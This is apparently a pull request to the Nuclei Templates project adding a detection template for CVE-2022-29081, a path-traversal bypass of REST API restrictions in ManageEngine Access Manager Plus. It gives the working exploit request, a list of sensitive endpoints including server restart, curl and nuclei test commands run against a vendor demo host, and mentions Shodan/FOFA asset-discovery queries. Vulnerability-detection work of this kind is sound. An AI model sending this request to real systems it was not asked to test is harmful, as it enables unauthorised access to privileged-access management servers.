🎯 PR Information

Added CVE-2022-29081 - Zoho ManageEngine Access Manager Plus REST API Restriction Bypass

Issue: #13982
Bounty Claim: /claim #13982
Severity: Critical (CVSS 9.8)
GHSA ID: GHSA-59xq-494m-chp8

🔍 Vulnerability Details

CVE: CVE-2022-29081
Type: REST API Access Control Bypass via Path Traversal
Attack Vector: Network (Unauthenticated Remote)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score: 0.00598 (98th percentile)

Affected Products:

• ManageEngine Access Manager Plus < build 4302
• ManageEngine Password Manager Pro < build 12007
• ManageEngine PAM360 < build 5401

Root Cause: The vulnerability stems from improper URI normalization in HttpServletRequest.getRequestURI() within com.manageengine.ads.fw.api.RestAPIUtil.isRestAPIRequest(). The function fails to properly neutralize path traversal sequences, allowing attackers to bypass API restrictions using patterns like /x/../RestAPI/.

CWE Classifications:

• CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
• CWE-863: Incorrect Authorization (Access Control Bypass)

🚀 Exploitation Details

Attack Pattern:

POST /x/..//RestAPI/LicenseMgr HTTP/1.1
Host: target.com:9292
Content-Type: application/x-www-form-urlencoded

operation=getLicenseDetails

Vulnerable Endpoints:

• /RestAPI/SSOutAction - Server restart functionality
• /RestAPI/SSLAction - SSL certificate management
• /RestAPI/LicenseMgr - License management (used in PoC)
• /RestAPI/GetProductDetails - Product information disclosure
• /RestAPI/GetDashboard - Dashboard data access
• /RestAPI/FetchEvents - Event log retrieval
• /RestAPI/Synchronize - Synchronization operations

Expected Vulnerable Response:

{
  "BUILD_NO":"4301",
  "LICENSE_TO":"ManageEngine",
  "COMPONENT_DETAILS":{"Days to Expire":"23days.","Number of Users":10},
  "VERSION":"4.3.0",
  "LICENSE_TYPE":"Standard Edition - Trial Version",
  "LICENSE_TYPE_CODE":"T",
  "PRODUCT_NAME":"AccessManagerPlus"
}

🛡️ Template Features

✅ Complete PoC Implementation (not version-only detection)
✅ Multi-layer Matchers to prevent false positives:

• Layer 1: HTTP 200 status code validation
• Layer 2: Response body contains BUILD_NO, LICENSE_TO, PRODUCT_NAME (all required)
• Layer 3: Application identification (ManageEngine OR AccessManagerPlus)

✅ Follows ProjectDiscovery Standards
✅ Asset Discovery Queries (Shodan/FOFA/Google)
✅ Proper Metadata (vendor, product, max-request)

✅ Template Validation

1. Syntax Validation - PASSED

nuclei -validate -t http/cves/2022/CVE-2022-29081.yaml
# Result: All templates validated successfully ✅

2. False Positive Testing - PASSED

# Test 1: Against example.com (non-vulnerable target)
nuclei -t http/cves/2022/CVE-2022-29081.yaml -u https://example.com -debug
# Result: No false positives ✅

# Test 2: Against ManageEngine official demo (patched build 4401)
curl -sk -d 'operation=getLicenseDetails' 'https://demo.accessmanagerplus.com/x/..//RestAPI/LicenseMgr'
# Response: HTTP 404 (API endpoint removed in patched version)

nuclei -t http/cves/2022/CVE-2022-29081.yaml -u https://demo.accessmanagerplus.com -debug
# Result: No match (correctly identifies patched version) ✅

3. Weak Matcher Prevention - PASSED

# Test against ProjectDiscovery honeypot
nuclei -t http/cves/2022/CVE-2022-29081.yaml -u http://honey.scanme.sh -debug
# Result: No match (HTTP 301 redirect, no required response fields) ✅

4. Request Format Verification - PASSED

✅ Correct path traversal pattern: /x/..//RestAPI/LicenseMgr
✅ Correct POST body: operation=getLicenseDetails
✅ Matches Tenable PoC exactly
✅ Uses raw HTTP request to preserve path traversal

📚 References & Sources

Official Advisories:

• Tenable Security Advisory TRA-2022-14
• ManageEngine Official Advisory
• NVD Entry
• GitHub Advisory Database

Technical Details:

• Published: April 29, 2022
• EPSS Score: 0.00598 (98th percentile)
• Attack Complexity: Low
• Privileges Required: None
• User Interaction: None

🔬 Vulnerable Instance Access

Status: Located vulnerable build 4301 at ManageEngine archives
Source: https://archives.manageengine.com/privileged-session-management/4301/
File: ManageEngine_AMP_64bit.bin (239MB)

Installation Challenge: Requires Java runtime configuration on macOS

Available for Testing: I am ready to:

1. Test against any vulnerable instance the team can provide
2. Complete installation with guidance
3. Provide video demonstration if I can get the instance running
4. Coordinate validation via templates@projectdiscovery.io

🎯 Quality Assurance

Template Compliance:

• ✅ Follows Template Creation Guidelines
• ✅ Adheres to Contribution Guidelines
• ✅ Implements Strong Matcher Guidelines

Code Quality:

• ✅ All yamllint checks passed
• ✅ No trailing spaces or formatting issues
• ✅ Proper comment formatting
• ✅ Multi-layer AND conditions prevent false positives

Security Testing:

• ✅ Does not match honeypot targets
• ✅ Does not match patched versions
• ✅ Does not match non-ManageEngine applications
• ✅ Requires specific response pattern for match

💰 Bounty Information

Bounty Issue: #13982
Estimated Range: $100 Qualification Status: Template ready, pending vulnerable instance validation

Template Quality:

• Complete PoC implementation ✅
• Strong matchers (not weak) ✅
• HTTP protocol template ✅
• Follows PD standards ✅

Thank you for reviewing this contribution to the Nuclei Templates project! 🙏